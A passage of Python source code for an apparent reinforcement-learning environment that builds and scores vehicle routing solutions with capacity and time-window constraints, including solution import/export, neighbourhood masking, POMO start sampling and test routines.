div_idx = div_smp_idx[i][j[i]]
if div_idx not in idx:
idx.append(div_idx)
else:
j[i] += 1
continue
if i < num_best-1:
i += 1
else:
i = 0
tours.append(best_smps + [other_smps[i] for i in idx])
costs.append(best_costs + [other_costs[i] for i in idx])
else:
raise ValueError(f"unknown selection mode: {mode}.")
logger.info(f"export done after {time.time() - t_start: .3f}s.")
return tours, costs
else:
tp = self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1))
return self._sol_to_list(tp), self.total_cost.clone().cpu().tolist()
def _sol_to_list(self, tp: torch.Tensor):
# handles solutions which contain unvisited nodes as singleton tours
# for loop is OK here, normally we only export solutions for small amounts of instances
tours = []
full_set = set(range(self.graph_size))
for plans in tp:
tour_set = []
for plan in plans:
unq = torch.unique(plan)
singletons = []
# if len(unq) != self.graph_size:
# singletons = [[0, e, 0] for e in full_set - set(unq.cpu().tolist())]
# plan = plan[plan.sum(-1) > 0].cpu()
# tour_set.append([[0] + tp[tp > 0].tolist() + [0] for tp in plan] + singletons)
if len(unq) != self.graph_size:
singletons = [[e] for e in full_set - set(unq.cpu().tolist())]
plan = plan[plan.sum(-1) > 0].cpu()
tour_set.append([tp[tp > 0].tolist() for tp in plan] + singletons)
tours.append(tour_set)
return tours
def import_sol(self, sol: List[List], cost: Optional[List] = None) -> RPObs:
"""Import partial RP solutions represented in a list of lists format
and update buffers and state correspondingly."""
# CONVENTION: all 'complete' tours start and end at the depot idx.
# all other tours are considered partial tours or singletons
# resulting from the destruction procedure.
# sol: (BS, num_samples, num_tours, ...)
assert self.inference, f"Can only import solutions in inference mode."
# check dims
org_bs = self.bs // self.num_samples # number of instances
assert len(sol) == org_bs
n_samples = np.array([len(s) for s in sol])
assert np.all(n_samples == n_samples[0])
n_samples = n_samples[0]
if self.pomo:
assert self.num_samples == n_samples, f"imported solutions for POMO must include num_samples " \
f"samples, but got {n_samples} != {self.num_samples}"
else:
assert self.num_samples % n_samples == 0
sample_fact = self.num_samples // n_samples
# reset buffers
# instead of re-creating the tensors we just fill them with the correct reset values
self._visited.fill_(value=0)
self._finished.fill_(value=0)
self.tour_plan.fill_(value=0)
self.active_vehicles.fill_(value=0)
self.next_index_in_tour.fill_(value=0)
self.cur_node.fill_(value=0)
self.cur_cap.fill_(value=self.vehicle_capacity)
self.cur_time.fill_(value=0)
self.cur_time_to_depot.fill_(value=0)
recompute_cost = False
if cost is not None:
self._total = torch.tensor(cost, dtype=self._total.dtype, device=self.device)
else:
recompute_cost = True
total_costs = []
# read in solutions
bs_idx = 0
for inst_sol in sol:
for smp in inst_sol:
# partial tours are all non-singleton tours which do not start and end at the depot
num_partial = 0
t_idx = 0
service_tm = self.service_time[bs_idx]
costs = []
for tour in smp:
l = len(tour)
if l > 1:
try:
# complete
if tour[0] == tour[-1] == self.depot_node[0]: # starts and ends at depot node
# just add to tour plan
self.tour_plan[bs_idx, t_idx, :l-1] = torch.tensor(
tour[1:], dtype=self.tour_plan.dtype, device=self.device
)
self._finished[bs_idx, t_idx] = True
if recompute_cost:
costs.append(self._recompute_cost(tour, bs_idx, service_tm))
# partial
else:
t = torch.tensor(tour, dtype=torch.long, device=self.device)
self.tour_plan[bs_idx, t_idx, :l] = t.to(dtype=self.tour_plan.dtype)
# add to cumulative buffers
self.cur_node[bs_idx, num_partial] = t[-1]
self.cur_cap[bs_idx, num_partial] = (
1.0 - self.demands[bs_idx].gather(dim=-1, index=t).sum()
)
self.cur_time_to_depot[bs_idx, num_partial] = self.time_to_depot[bs_idx, t[-1]]
# recalculate current time of vehicle
tm = self._recompute_cost(t, bs_idx, service_tm)
if recompute_cost:
costs.append(tm)
self.cur_time[bs_idx, num_partial] = tm
self.next_index_in_tour[bs_idx, num_partial] = len(t)
self.active_vehicles[bs_idx, t_idx] = True
num_partial += 1
except IndexError:
raise RuntimeError(f"Number of tours of provided solution "
f"is larger than max_num_vehicles!")
t_idx += 1
# singleton tour
else:
pass # nothing to do in this case
# check if number of partial tours <= max_concurrent_vehicles
assert num_partial <= self.max_concurrent_vehicles
must_assign = self.max_concurrent_vehicles-num_partial
if must_assign > 0:
# start a new tour for each non existing partial tour
for i in range(num_partial, num_partial+must_assign):
nxt_active = self._get_next_active_vehicle()[bs_idx]
self.active_vehicles[bs_idx, nxt_active] = 1
self.active_to_plan_idx[bs_idx, i] = nxt_active
# adapt visitation status
nz = self.tour_plan[bs_idx].nonzero(as_tuple=True)
self._visited[bs_idx, self.tour_plan[bs_idx, nz[0], nz[1]].long()] = 1
if recompute_cost:
total_costs.append(sum(costs))
# inc per sample
bs_idx += sample_fact
if recompute_cost:
self._total = torch.tensor(total_costs, dtype=self.fp_precision, device=self.device)
# re-expand if the number of samples changed during selection procedure
# POMO sampling will always do the expansion during the destruction procedure,
# but standard sampling needs it here explicitly
if n_samples != self.num_samples:
self._expand_sample_dimension(sample_fact)
#
self.active_to_plan_idx = self.active_vehicles.nonzero(as_tuple=True)[1].view(self.bs, -1)
# re-create graph
self.to_graph()
self._has_instance = True
self._is_reset = True
self._step = (self._visited.sum(-1) + self._finished.sum(-1)).max().cpu().item()
return self._get_observation()
def _recompute_cost(self, tour: Union[List, torch.Tensor], bs_idx: int, service_time: float):
# recalculate current time of vehicle
tm = 0
prev = 0
for nxt in tour:
# select from distance matrix
tm += self._dist_mat[bs_idx, prev, nxt]
# add waiting time and service time
tm += ((self.tw[bs_idx, nxt][0] - tm).clamp_(min=0) + service_time)
prev = nxt
return tm.cpu().item()
def destruct(self, **kwargs):
"""Tensor-based native destruction operator circumventing
expensive conversion to lists during solution export/import."""
raise NotImplementedError
@staticmethod
def _cumsum0(t: torch.Tensor) -> torch.Tensor:
"""calculate cumsum of t starting at 0."""
return torch.cat((
torch.zeros(1, dtype=t.dtype, device=t.device),
torch.cumsum(t, dim=-1)[:-1]
), dim=0)
@property
def depot_node(self) -> torch.Tensor:
"""idx of depot node is always 0."""
if self._zero.device != self.device:
self._zero = self._zero.to(device=self.device)
return self._zero[:, None].expand(-1, self.bs).view(-1)
@property
def idx_inc(self) -> torch.Tensor:
"""Returns the index increase necessary to
transform to BS x N running index."""
assert self.depot_idx is not None and len(self.depot_idx) == self.bs
return self.depot_idx
@property
def visited(self) -> torch.BoolTensor:
"""Returns mask for all nodes without depot (BS, N-1),
indicating if the respective node was already visited."""
return self._visited[:, 1:]
@property
def k_used(self) -> torch.Tensor:
"""Returns the number of vehicles used for each instance."""
_active = self.active_vehicles.clone()
_active[self.active_vehicles] = (self.cur_node != self.depot_node[:, None]).view(-1)
return (self._finished | _active).sum(-1)
@property
def total_cost(self) -> torch.Tensor:
"""return the current total cost of the solution."""
return self._total.clone()
@property
def num_samples(self):
return self._num_samples
def to_graph(self) -> None:
"""Create static nbh graph and dynamic tour graph components."""
if self.depot_idx is None:
# starting node indices of each batch instance are exactly depot
self.depot_idx = self._cumsum0(
torch.from_numpy(np.full(self.bs, self.graph_size))
.to(dtype=torch.long, device=self.device)
)
if self._tour_batch_idx is None:
self._tour_batch_idx = torch.arange(self.bs, device=self.device)[:, None].expand(-1, self.max_vehicle_number)
# nbh graph is static and only needs to be created at start of episode
if self.nbh_edges is None or self.nbh_weights is None:
nbh_edges, nbh_weights = [], []
for i, c in enumerate(self.coords):
e = self.nbh_sampler(c)
nbh_edges.append(e + self.idx_inc[i]) # increase node indices by running idx
# calculate weights
idx_coords = c[e]
nbh_weights.append(
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1])/self.org_service_horizon[i]
)
self.nbh_edges = torch.cat(nbh_edges, dim=-1)
self.nbh_weights = torch.cat(nbh_weights, dim=-1)
self.k_nbh_size = self.nbh_sampler.k
if self.tour_edges is None or self.tour_weights is None:
# initialize - no tours exist
# create just dummy edges from depot to depot
self.tour_edges = torch.cat((self.depot_idx[None, :], self.depot_idx[None, :]), dim=0)
self.tour_weights = torch.zeros(self.bs, dtype=self.fp_precision, device=self.device)
elif (self._step <= self.max_concurrent_vehicles+1) or (self._step % self.tour_graph_update_step == 0):
# infer edges from current routes
# select all routes which are either finished or active (partial solutions)
selection_mask = self._finished | self.active_vehicles
# increase to running idx and get corresponding node indices
#tours = (self.tour_plan + self.idx_inc[:, None, None])[selection_mask]
tours = (
self.tour_plan[selection_mask] +
self.idx_inc[:, None, None].expand(-1, selection_mask.size(-1), 1)[selection_mask]
)
if self.debug_lvl > 1:
assert (tours[:, -1] == self.depot_idx.repeat_interleave(selection_mask.sum(-1), dim=-1)).all()
sbl = tours.size(-1)
tours = tours.view(-1, sbl) # (BS, max_concurrent, seq_buffer_len) -> (-1, seq_buffer_len)
# create edges as node idx pairs
# automatically adds an edge from the last node back to the depot
tours = torch.cat((
torch.roll(tours, shifts=1, dims=-1)[:, None, :], # cyclic shift by 1
tours[:, None, :]
), axis=1).permute(1, 0, 2).reshape(2, -1)
tour_batch_idx = self._tour_batch_idx[selection_mask]
# remove dummies (depot self loops)
selection_mask = (tours[0, :] != tours[1, :])
self.tour_edges = tours[:, selection_mask]
# get weights
# TODO: better way than with tour_batch_idx which is only used here?!
tour_batch_idx = (
tour_batch_idx[:, None].expand(-1, sbl).reshape(-1)
)[selection_mask]
if self.inference:
# select from distance matrix
idx = self.tour_edges - self.idx_inc[tour_batch_idx]
self.tour_weights = self._dist_mat[tour_batch_idx][
torch.arange(tour_batch_idx.size(0), device=self.device), idx[0,], idx[1,]
]
else:
# compute on the fly
idx_coords = self.coords.view(-1, 2)[self.tour_edges]
self.tour_weights = (
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1]) /
self.org_service_horizon[tour_batch_idx]
)
else:
# no update to tour graph
self.tour_edges = torch.empty(0)
self.tour_weights = torch.empty(0)
def get_node_nbh(self, node_idx: torch.Tensor) -> torch.LongTensor:
"""Return the neighborhood of the specified nodes."""
assert node_idx.size(0) == self.bs
depot_mask = (node_idx == 0)
if depot_mask.any():
# first N elements in self.nbh_edges[0] are depot nbh
depot_nbh = self.nbh_edges.view(2, self.bs, -1)[:, :, :self.graph_size]
if self.ordered_idx is None:
# order the nodes in the depot nbh by their distance to depot
idx_coords = self.coords.view(-1, 2)[depot_nbh.reshape(2, -1)]
# here euclidean distance is sufficient
self.ordered_idx = torch.norm(idx_coords[0]-idx_coords[1], p=2, dim=-1)\
.view(self.bs, -1)\
.argsort(dim=-1, descending=False)
# first check visitation status
vis_mask = ~self._visited.gather(dim=-1, index=self.ordered_idx)
# get mask of the first 'nbh_size' closest unvisited nodes
_msk = vis_mask.cumsum(dim=-1) <= self.k_nbh_size
mask = torch.zeros_like(vis_mask)
mask[_msk] = vis_mask[_msk]
# if there are less than 'nbh_size' unvisited nodes, correct mask
# since we always need at least 'nbh_size' nodes for batching,
# they will just be masked in the selection procedure
missing_to_nbh_size = -mask.sum(-1) + self.k_nbh_size
missing = missing_to_nbh_size > 0
if missing.any():
# create mask of the first 'missing_to_nbh_size' positions to set to true
zmsk = ~mask[missing]
zmsk = (
zmsk.cumsum(-1) == missing_to_nbh_size[missing, None]
).fliplr().cumsum(-1).fliplr().to(torch.bool)
_msk = torch.zeros_like(mask)
_msk[missing] = zmsk
mask[_msk] = 1
# select corresponding node indices
select_idx = self.ordered_idx[mask].view(self.bs, -1)
depot_nbh = depot_nbh[0].gather(dim=-1, index=select_idx)
if depot_mask.all():
return (
depot_nbh[:, None, :].expand(self.bs, self.max_concurrent_vehicles, -1) -
self.idx_inc[:, None, None]
)
# get other node nbh
nbh = self.nbh_edges.view(2, self.bs, -1)[:, :, self.graph_size:]
nbh = (
nbh[0].view(self.bs, self.graph_size-1, self.k_nbh_size)
# here we just clamp to enable the gather operation on dummy depot node indices,
# they are then replaced below
.gather(dim=1, index=(torch.clamp(node_idx-1, min=0))[:, :, None].expand(self.bs, -1, self.k_nbh_size))
)
if depot_mask.any():
# replace depot nbh
nbh[depot_mask] = depot_nbh.repeat_interleave(depot_mask.sum(-1), dim=0)
return nbh - self.idx_inc[:, None, None]
def compute_distance_matrix(self, coords: torch.Tensor, normalize: bool = True) -> torch.Tensor:
"""Calculate (BS, N, N) distance (transit) matrix."""
if normalize:
return self._compute_normed_distance_matrix(coords, self.org_service_horizon)
else:
return dimacs_challenge_dist_fn(coords[:, :, None, :], coords[:, None, :, :])
@staticmethod
@torch.jit.script
def _compute_normed_distance_matrix(coords: torch.Tensor, denom: torch.Tensor) -> torch.Tensor:
return (
dimacs_challenge_dist_fn(coords[:, :, None, :], coords[:, None, :, :]) /
denom[:, None, None]
)
def _randint(self, bs: int, n: int, high: int, low: int = 0, replace: bool = False):
"""Draws n random integers between low (inc) and high (exc) for batch of size bs."""
if self._one.device != self.device:
self._one = self._one.to(device=self.device)
return torch.multinomial(
self._one[:, None, None].expand(-1, bs, high).view(bs, high),
n, replacement=replace) + low
def _get_nbh_and_mask(self) -> Tuple[torch.LongTensor, torch.BoolTensor]:
"""Returns the NBH of each node at which an active vehicle currently is positioned.
Moreover, creates a feasibility mask over this NBH by
- checking if node was already visited
- checking if remaining capacity of vehicle is sufficient
- checking if the node can still be served by the current vehicle within the respective TW
Returns:
nbh: (BS, max_concurrent, NBH),
mask: (BS, max_concurrent, NBH)
"""
# get node neighborhood of current nodes
nbh = self.get_node_nbh(self.cur_node)
# start creating mask (True where infeasible)
# self-loops are masked automatically, since they just have been set as visited in step()
# check which nodes were already visited
mask = self._visited[:, None, :]\
.expand(self.bs, self.max_concurrent_vehicles, -1)\
.gather(dim=-1, index=nbh)
# feasibility regarding capacity
exceeds_cap = self.cur_cap[:, :, None] < self.demands[:, None, :]\
.expand(self.bs, self.max_concurrent_vehicles, -1)\
.gather(dim=-1, index=nbh)
# feasibility regarding (hard) TWs
# check if current time of vehicle + travel time to a node is smaller than
# the latest start time of that node
if self.inference:
# select from distance matrix
d = self.max_concurrent_vehicles * self.k_nbh_size
t_delta = self._dist_mat[
self._bidx[:, None].expand(-1, d).reshape(-1),
self.cur_node[:, :, None]
.expand(self.bs, self.max_concurrent_vehicles, self.k_nbh_size)
.reshape(-1),
nbh.view(-1)
].view(self.bs, self.max_concurrent_vehicles, -1)
else:
# compute on the fly
idx_pair = torch.stack((
self.cur_node[:, :, None].expand(self.bs, self.max_concurrent_vehicles, self.k_nbh_size).reshape(self.bs, -1),
nbh.view(self.bs, -1)
), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
t_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
).view(self.bs, self.max_concurrent_vehicles, -1)
arrival_time = self.cur_time[:, :, None] + t_delta
exceeds_tw = arrival_time > (
self.tw[:, :, -1][:, None, :]
.expand(self.bs, self.max_concurrent_vehicles, self.graph_size)
.gather(dim=-1, index=nbh)
)
at_depot = self.cur_node == 0
# debug checks
if self.debug_lvl > 1:
if (
not (self._get_next_active_vehicle() == 0).any() and
not self.visited.all(-1).any() and
not self.inference
):
assert self.cur_time[at_depot].sum() == 0
assert (self.cur_cap[at_depot] - 1).sum() == 0
assert self.cur_time_to_depot[at_depot].sum() == 0
assert t_delta[at_depot][:, 0].sum() == 0
assert exceeds_cap[at_depot].sum() == 0
assert exceeds_tw[at_depot].sum() == 0
# in case there is a vehicle starting from the depot
# and there is at least one unvisited node and one unused vehicle left
# then we mask the depot node
mask_depot = (
~self.visited.all(-1) &
((self._finished.sum(-1) < self.max_concurrent_vehicles) | (self._get_next_active_vehicle() != 0))
)
mask_depot = at_depot & mask_depot[:, None].expand(-1, self.max_concurrent_vehicles)
if mask_depot.any():
mask[mask_depot, torch.zeros(mask_depot.sum(), dtype=torch.long, device=self.device)] = 1
# combine masks
mask = mask | exceeds_cap | exceeds_tw
if (mask.all(-1)).any():
raise RuntimeError(f"no feasible nodes left: {mask.all(-1).nonzero()}")
return nbh, mask
def _stack_to_tensor(self,
batch: List[RPInstance],
key: Union[str, int],
dtype: Optional[torch.dtype] = None
) -> torch.Tensor:
"""Takes a list of instances and stacks the attribute
indicated by 'key' into a torch.Tensor."""
return torch.from_numpy(
np.stack([x[key] for x in batch], axis=0)
).to(dtype=dtype if dtype is not None else self.fp_precision, device=self.device).contiguous()
def _get_next_active_vehicle(self) -> torch.LongTensor:
"""
Return the index of the next available vehicle.
If no vehicles are available anymore, returns 0.
"""
return torch.argmin((self._finished | self.active_vehicles).to(torch.int), dim=-1)
def _get_observation(self) -> RPObs:
"""Gather the current observations."""
nbh, mask = self._get_nbh_and_mask()
return RPObs(
batch_size=self.bs,
node_features=torch.cat((
self.coords,
self.demands[:, :, None],
self.tw,
self.service_time[:, None, None].expand(self.bs, self.graph_size, 1),
self.time_to_depot[:, :, None],
), dim=-1),
node_nbh_edges=self.nbh_edges,
node_nbh_weights=self.nbh_weights,
# only select active
tour_plan=self.tour_plan.gather(
dim=1, index=self.active_to_plan_idx[:, :, None].expand(self.bs, -1, self.tour_plan.size(-1))
).to(dtype=torch.long),
# these are just the features of currently active tours!
tour_features=torch.cat((
self.cur_node[:, :, None], # just node idx!
self.cur_cap[:, :, None],
self.cur_time[:, :, None],
self.cur_time_to_depot[:, :, None],
# last entry encodes 'vehicle id' as well as 'number of remaining vehicles'
((-self.active_to_plan_idx + self.max_vehicle_number)/self.max_vehicle_number)[:, :, None],
), dim=-1),
tour_edges=self.tour_edges,
tour_weights=self.tour_weights,
nbh=nbh,
nbh_mask=mask,
)
def _update(self,
tour_select: torch.LongTensor,
next_node: torch.LongTensor,
non_depot_mask: torch.BoolTensor,
) -> torch.Tensor:
"""Update tours."""
previous_node = self.cur_node[self._bidx, tour_select]
# update node
self.cur_node[self._bidx, tour_select] = next_node
# update load
self.cur_cap[self._bidx, tour_select] = (
self.cur_cap[self._bidx, tour_select] - self.demands[self._bidx, next_node]
)
if self.check_feasibility:
assert (self.cur_cap[self._bidx, tour_select] >= 0).all()
# update time
if self.inference:
# select from distance matrix
cur_time_delta = self._dist_mat[self._bidx, previous_node, next_node]
else:
# compute on the fly
idx_pair = torch.stack((previous_node, next_node), dim=0)
idx_coords = self.coords[self._bidx, idx_pair]
cur_time_delta = (
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1]) /
self.org_service_horizon[self._bidx]
)
tw = self.tw[self._bidx, next_node]
arrival_time = self.cur_time[self._bidx, tour_select] + cur_time_delta
if self.check_feasibility:
if not (arrival_time <= tw[:, 1]).all():
inf_msk = (arrival_time > tw[:, 1])
td = arrival_time[inf_msk] - tw[inf_msk, 1]
raise RuntimeError(f"arrival time exceeds TW "
f"at idx: {inf_msk.nonzero()} w"
f"ith time diff of {td}, "
f"which equals {td/(1/self.org_service_horizon[inf_msk])} eps.")
# add waiting time and service time for non-depot nodes
cur_time_delta[non_depot_mask] = (
cur_time_delta[non_depot_mask] +
((tw[:, 0] - arrival_time).clamp_(min=0) + self.service_time[self._bidx])[non_depot_mask]
)
self.cur_time[self._bidx, tour_select] = self.cur_time[self._bidx, tour_select] + cur_time_delta
# update time to depot
time_to_depot_delta = self.time_to_depot[self._bidx, next_node]
previous_time_to_depot = self.cur_time_to_depot[self._bidx, tour_select]
self.cur_time_to_depot[self._bidx, tour_select] = time_to_depot_delta
# calculate cost
cost = cur_time_delta + (time_to_depot_delta - previous_time_to_depot)
return cost
def _return_all(self) -> torch.Tensor:
"""Return all vehicles to depot and update corresponding buffers and cost."""
must_return = (self.cur_node != self.depot_node[:, None])
cost = self._zero
if must_return.any():
next_node = self.depot_node[:, None].expand(-1, self.max_concurrent_vehicles).clone()
previous_node = self.cur_node.clone()
# update node
self.cur_node = next_node.clone()
# update time
if self.inference:
# select from distance matrix
cur_time_delta = self._dist_mat[
self._bidx[:, None].expand(self.bs, self.max_concurrent_vehicles).reshape(-1),
previous_node.view(-1),
next_node.view(-1)
].view(self.bs, self.max_concurrent_vehicles)
else:
# compute on the fly
idx_pair = torch.stack((previous_node, next_node), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
cur_time_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
).view(self.bs, self.max_concurrent_vehicles)
self.cur_time = self.cur_time + cur_time_delta
if self.check_feasibility:
assert (self.cur_time <= 1.0).all()
# update time to depot
self.cur_time_to_depot[:, :] = 0
# calculate cost
cost = cur_time_delta.sum(dim=-1)
return cost.to(dtype=self.fp_precision)
def _get_edges_to_render(self, b_idx: int = 0) -> List[np.ndarray]:
"""Select instance with b_idx and return corresponding edges as list of arrays."""
# select all routes which are either finished or active (partial solutions)
selection_mask = self._finished[b_idx] | self.active_vehicles[b_idx]
tours = self.tour_plan[b_idx][selection_mask]
max_pos = torch.argmin(tours, dim=-1)
truncated_tours = []
for tr, pos, fin in zip(tours, max_pos, self._finished[b_idx][selection_mask]):
trtr = tr[:pos+1]
if len(trtr) > 1:
trtr = torch.cat((
torch.roll(trtr, shifts=1, dims=-1)[:, None], # cyclic shift by 1
trtr[:, None]
), axis=1).T
truncated_tours.append(trtr[:, :pos+fin].view(2, -1).cpu().numpy())
return truncated_tours
def _init_sampling(self):
"""Expand currently loaded instance(s) over sampling dimension."""
bs, n, _ = self.coords.size()
self.coords = self.coords[:, None, :, :].expand(bs, self._num_samples, n, 2).reshape(-1, n, 2).contiguous()
self.demands = self.demands[:, None, :].expand(self.bs, self._num_samples, n).reshape(-1, n)
self.tw = self.tw[:, None, :, :].expand(bs, self._num_samples, n, 2).reshape(-1, n, 2)
self.service_time = self.service_time[:, None].expand(self.bs, self._num_samples).reshape(-1)
self.time_to_depot = self.time_to_depot[:, None, :].expand(self.bs, self._num_samples, n).reshape(-1, n)
self.org_service_horizon = self.org_service_horizon[:, None].expand(self.bs, self._num_samples).reshape(-1)
if self.inference and self._dist_mat is not None:
self._dist_mat = self._dist_mat[:, None, :, :].expand(self.bs, self._num_samples, n, n).reshape(-1, n, n)
self.bs = int(self.bs * self._num_samples)
self._bidx = torch.arange(self.bs, device=self.device)
def _expand_sample_dimension(self, samples_fact: int):
"""Re-expand sampling dimension from imported selection to original sampling dimension."""
cur_idx = torch.arange(0, self.num_samples, samples_fact, device=self.device)
self._visited = self._visited[cur_idx].repeat_interleave(samples_fact, dim=0)
self._finished = self._finished[cur_idx].repeat_interleave(samples_fact, dim=0)
self.tour_plan = self.tour_plan[cur_idx].repeat_interleave(samples_fact, dim=0)
self.active_vehicles = self.active_vehicles[cur_idx].repeat_interleave(samples_fact, dim=0)
self.next_index_in_tour = self.next_index_in_tour[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_node = self.cur_node[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_cap = self.cur_cap[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_time = self.cur_time[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_time_to_depot = self.cur_time_to_depot[cur_idx].repeat_interleave(samples_fact, dim=0)
self._total = self._total.repeat_interleave(samples_fact, dim=0)
def _reset_pomo(self):
"""Sample different starting nodes for POMO sample rollouts and
directly move vehicles from depot to their start nodes."""
# get the nodes in the vicinity of the depot
nbh = self.get_node_nbh(self.depot_node)
# remove depot self-loop
nbh = nbh[:, :, 1:]
if self.pomo_single_start_node:
# select only one random start node per sample, independent of max_concurrent_vehicles
num_start_nodes = 1
# per convention we always select the node for the first tour
start_tours = self._zero[None].expand(self.bs, -1).view(-1, 1)
# order early TW by start time and select first num_samples
nbh = nbh.view(-1, self.num_samples, self.max_concurrent_vehicles, self.k_nbh_size-1)[:, 0, 0, :]
early_tw_idx = (
self.tw.view(-1, self.num_samples, self.graph_size, 2)[:, 0, :, 0]
.gather(dim=-1, index=nbh).argsort(dim=-1)[:, :self.num_samples]
)
# all vehicles start at depot -> nbh is exactly the same for each sample of the same instance
# so we get the first num_samples sorted start nodes of first sample and reshape back to batch
start_nodes = nbh.gather(dim=-1, index=early_tw_idx).view(-1, 1)
else:
num_start_nodes = self.max_concurrent_vehicles
# check the TW and select the fraction with the earliest TW as possible start nodes
# since nodes with late TW cannot be optimal!
k = math.floor((self.k_nbh_size-1) * self.pomo_nbh_frac)
early_tw_idx = self.tw[:, :, 0].gather(dim=-1, index=nbh[:, 0, :]).argsort(dim=-1)[:, :k]
# all vehicles start at depot -> nbh is exactly the same for all max_concurrent_vehicles per instance
# so we get first only and expand to full max_concurrent_vehicles
nbh = nbh.gather(dim=-1, index=early_tw_idx[:, None, :].expand(self.bs, self.max_concurrent_vehicles, k))
# sample random idx
# we need to sample num_samples different start node configurations of
# the max_concurrent_vehicles used
try:
rnd_idx = self._randint(
bs=self.bs,
n=self.max_concurrent_vehicles,
high=k,
)
except RuntimeError:
raise RuntimeError(f"sample set for POMO has size {k} which is too "
f"small for {self.num_samples} samples! "
f"Try increasing 'k_nbh_frac' of env.")
start_nodes = nbh.gather(dim=-1, index=rnd_idx[:, :, None]).view(self.bs, -1)
start_tours = torch.arange(self.max_concurrent_vehicles, device=self.device)[None, :].expand(self.bs, -1)
# execute pseudo steps for each tour-start_node sample combination
msk = torch.ones(self.bs, dtype=torch.bool, device=self.device)
cost = 0
for i in range(num_start_nodes):
tour_select = start_tours[:, i]
next_node = start_nodes[:, i]
tour_plan_select = self.active_to_plan_idx[self._bidx, tour_select]
cost += self._update(tour_select, next_node, msk)
# add next node in tour
nxt = self.next_index_in_tour[self._bidx, tour_select]
self.tour_plan[self._bidx, tour_plan_select, nxt] = next_node.to(torch.int16)
# increase idx of next position in tour
self.next_index_in_tour[self._bidx, tour_select] = nxt + 1
self._visited[self._bidx, next_node] = 1
# depot node is never marked as visited!
self._visited[:, 0] = 0
# update graph data
self.to_graph()
self._total += cost
self._step += num_start_nodes
# ============= #
# ### TEST #### #
# ============= #
def _test():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 128
N = 100
BS = 64
BS_ = BS
MAX_CON = 5
CUDA = False
SEED = 123
POMO = True
N_POMO = 8
POMO_SINGLE = True
if POMO:
BS_ = BS//N_POMO
SMP = 2 * BS_
INFER = True
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
pomo_single_start_node=POMO_SINGLE,
num_samples=N_POMO,
inference=INFER,
)
env.seed(SEED+1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
#print(env.coords[:, 0])
while not done:
#print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
#print(info)
sol = env.export_sol()
print(sol)
def _test_io():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, GROUPS, TYPES, TW_FRACS
SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
LPATH = "./solomon_stats.pkl"
SMP = 64
N = 50
BS = 16
BS_ = BS
MAX_CON = 3
CUDA = False
SEED = 123
POMO = True
N_SMP = 16
if N_SMP > 1:
assert BS % N_SMP == 0
BS_ = BS//N_SMP
assert BS_ == 1
SMP = 2 * BS_
INFER = True # IO only for inference!
ITERS = 3
NO_COST = True
device = torch.device("cuda" if CUDA else "cpu")
rnd = np.random.default_rng(SEED)
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_SMP,
inference=INFER,
)
env.seed(SEED+1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
#print(env.coords[:, 0])
for m in range(ITERS):
print(f"iter: {m}")
done = False
i = 0
while not done:
#print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
i += 1
# export solution
sol, cost = env.export_sol(3, 3, "dis")
print(sol[0])
# solution shape is (BS, num_samples, num_tours, ...)
#assert len(sol) == BS
new_solutions = []
for s in sol:
s = s[0] # here only use first sample
